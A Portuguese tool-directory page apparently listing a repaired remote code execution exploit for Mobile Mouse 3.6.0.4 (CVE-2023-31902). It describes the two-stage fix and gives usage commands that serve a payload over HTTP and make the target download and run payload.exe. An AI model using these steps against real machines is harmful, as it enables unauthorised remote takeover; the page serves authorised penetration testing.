Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
mouseserver-exploit — Mobile Mouse 3.6.0.4 - Execução Remota de Código - CVE-2023-31902 | Kitploit
Ferramentas/GitHubGitHub/lypd0/mouseserver-exploit
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoRed Teaming
GitHublypd0/mouseserver-exploit

mouseserver-exploit

Mobile Mouse 3.6.0.4 - Execução Remota de Código - CVE-2023-31902

Ver Repositório
11há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Mobile Mouse 3.6.0.4 RCE - Correção

Uma versão corrigida do exploit de execução remota de código do Mobile Mouse 3.6.0.4 publicado como EDB-51010.

Vulnerabilidade

  • CVE: CVE-2023-31902
  • Versão afetada: Mobile Mouse 3.6.0.4
  • Porta padrão: TCP/9099

O Que Foi Corrigido

O exploit original baixa o payload com sucesso, mas pode falhar ao executá-lo porque ambos os estágios usam a mesma conexão TCP.

Esta versão:

  • Baixa o payload através da primeira sessão
  • Aguarda a conclusão do download
  • Abre uma nova conexão
  • Repete o handshake do Mobile Mouse
  • Executa o payload baixado

Ele também usa sendall(), caminhos do Windows devidamente escapados, timeouts de socket e tratamento básico de erros.

Uso

Inicie um servidor HTTP no diretório do payload:

root@kitploit:~
python3 -m http.server 8080

Execute o exploit:

root@kitploit:~
python3 exploit.py \
  --target 192.168.1.50 \
  --lhost 192.168.1.10 \
  --file payload.exe

Aviso Legal

Este projeto é destinado apenas a testes de segurança autorizados e pesquisa educacional. Não o utilize contra sistemas sem permissão explícita.

Baixar ferramenta